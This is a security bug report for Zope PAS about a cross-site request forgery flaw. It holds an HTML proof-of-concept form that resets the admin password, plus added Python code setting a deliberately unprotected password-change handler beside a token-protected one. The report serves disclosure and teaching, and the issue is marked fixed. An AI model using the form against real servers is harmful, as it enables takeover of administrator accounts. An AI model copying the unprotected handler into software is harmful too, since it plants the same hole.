userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas
This bug affects 1 person
Affects: Zope PAS
Assigned to: Tres Seaver

Bug Description

The following HTML allows the admin password to be reset:

<!-- Cross-site form: a POST to the password-change view carries no anti-CSRF token, so the victim's own session cookie authorizes the change -->
<form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
  user_id : <input value="admin" name="user_id">
  password: <input value="zenoss26" name="password">
  confirm : <input value="zenoss26" name="confirm">
  <input type="submit">
</form>

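The mitigation for this class of bug is to bind every state-changing POST to a token that a cross-origin page cannot read. The following is an added illustration, not code from the bug report or from Zope PAS itself: a minimal password-change handler in its unprotected shape next to a hardened version that requires a per-session HMAC token (the `_authenticator` field name, the session id and the server secret are assumptions of this example).

```python
"""Added example: CSRF protection for a manage_updateUserPassword-style view."""
import hashlib
import hmac
import secrets

# Assumption: a per-server secret that never reaches the browser.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Derive the token the legitimate form embeds as a hidden field.

    It is keyed by the server secret and bound to the caller's session, so a
    page on another origin can neither read nor forge it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


class UserManager:
    def __init__(self):
        # Constructed sample store: user id -> password.
        self.passwords = {"admin": "old-password"}

    def manage_updateUserPassword_unprotected(self, form):
        """Vulnerable shape: nothing ties the request to a page the user
        actually loaded, so a forged cross-site POST succeeds on the strength
        of the victim's session cookie alone."""
        if form["password"] != form["confirm"]:
            return False
        self.passwords[form["user_id"]] = form["password"]
        return True

    def manage_updateUserPassword(self, session_id, form):
        """Hardened shape: reject the request unless it carries a token that
        matches the caller's session. Constant-time compare avoids leaking
        the token byte by byte."""
        supplied = form.get("_authenticator", "")
        if not hmac.compare_digest(supplied, csrf_token(session_id)):
            return False
        if form["password"] != form["confirm"]:
            return False
        self.passwords[form["user_id"]] = form["password"]
        return True
```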
Tres Seaver (tseaver)
Changed in zope-pas:
assignee: nobody → Tres Seaver (tseaver)
status: New → Confirmed
Tres Seaver (tseaver) wrote:
Changed in zope-pas:
status: Confirmed → Fix Committed
Tres Seaver (tseaver)
Changed in zope-pas:
status: Fix Committed → Fix Released
information type: Private Security → Public Security
This report contains Public Security information.
Everyone can see this security related information.
